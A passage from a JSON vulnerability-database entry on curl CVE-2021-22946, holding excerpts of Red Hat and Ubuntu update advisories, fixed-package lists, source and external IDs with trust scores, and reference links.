8.2):\n\nSource:\ncurl-7.61.1-12.el8_2.4.src.rpm\n\naarch64:\ncurl-7.61.1-12.el8_2.4.aarch64.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.aarch64.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.aarch64.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.aarch64.rpm\n\nppc64le:\ncurl-7.61.1-12.el8_2.4.ppc64le.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.ppc64le.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.ppc64le.rpm\n\ns390x:\ncurl-7.61.1-12.el8_2.4.s390x.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.s390x.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.s390x.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.s390x.rpm\n\nx86_64:\ncurl-7.61.1-12.el8_2.4.x86_64.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.i686.rpm\ncurl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.i686.rpm\ncurl-debugsource-7.61.1-12.el8_2.4.x86_64.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm\ncurl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-devel-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-minimal-7.61.1-12.el8_2.4.x86_64.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm\nlibcurl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-22946\nhttps://access.redhat.com/security/cve/CVE-2021-22947\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. ==========================================================================\nUbuntu Security Notice USN-5079-3\nSeptember 21, 2021\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n\nSummary:\n\nUSN-5079-1 introduced a regression in curl. One of the fixes introduced a\nregression on Ubuntu 18.04 LTS. This update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that curl incorrect handled memory when sending data to\n an MQTT server. A remote attacker could use this issue to cause curl to\n crash, resulting in a denial of service, or possibly execute arbitrary\n code. (CVE-2021-22945)\n Patrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946)\n Patrick Monnerat discovered that curl incorrectly handled responses\n received before STARTTLS. A remote attacker could possibly use this issue\n to inject responses and intercept communications. (CVE-2021-22947)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n curl 7.58.0-2ubuntu3.16\n libcurl3-gnutls 7.58.0-2ubuntu3.16\n libcurl3-nss 7.58.0-2ubuntu3.16\n libcurl4 7.58.0-2ubuntu3.16\n\nIn general, a standard system update will make all the necessary changes. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1858 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1917 - [release-5.1] Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22946"
},
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166319"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
}
],
"trust": 1.62
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22946",
"trust": 2.4
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.7
},
{
"db": "HACKERONE",
"id": "1334111",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164993",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166319",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166112",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165053",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165337",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164740",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164948",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164220",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021111512",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101006",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021092301",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062007",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022011905",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071832",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042261",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091514",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031433",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021110316",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091715",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022022222",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091601",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031104",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166714",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164172",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "169318",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3260",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4266",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3215",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3878",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3934",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3979",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1025",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3658",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0245",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4095",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3022",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3392",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1637",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1837",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3119.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3349",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3119",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3146",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4280",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-381420",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-22946",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166319"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"id": "VAR-202109-1790",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:30:44.639000Z",
"patch": {
"_id": null,
"data": [
{
"title": "HAXX Haxx curl Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=178532"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22946 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-319",
"trust": 1.1
},
{
"problemtype": "CWE-325",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20211029-0003/"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220121-0008/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213183"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/mar/29"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.7,
"url": "https://hackerone.com/reports/1334111"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2021/09/msg00022.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 1.0,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0245"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042261"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3349"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170303/gentoo-linux-security-advisory-202212-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111512"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165337/red-hat-security-advisory-2021-5191-02.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-man-in-the-middle-via-protocol-downgrade-36418"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3392"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6510176"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4280"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022022222"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3119"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3878"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021110316"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164948/red-hat-security-advisory-2021-4618-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062007"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169318/debian-security-advisory-5197-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164172/ubuntu-security-notice-usn-5079-2.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166714/red-hat-security-advisory-2022-1354-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166319/apple-security-advisory-2022-03-14-4.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4095"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4172"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4266"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1837"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1637"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101006"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164740/red-hat-security-advisory-2021-4059-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164220/ubuntu-security-notice-usn-5079-3.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6527796"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091514"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213183"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091715"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3215"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3022"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165135/red-hat-security-advisory-2021-4914-06.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071832"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165209/red-hat-security-advisory-2021-5038-04.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031433"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1025"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166112/red-hat-security-advisory-2022-0635-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3979"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3658"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022011905"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021092301"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3934"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091601"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165099/red-hat-security-advisory-2021-4848-07.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165053/red-hat-security-advisory-2021-4766-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164993/red-hat-security-advisory-2021-4628-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3119.2"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3260"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q3/167"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
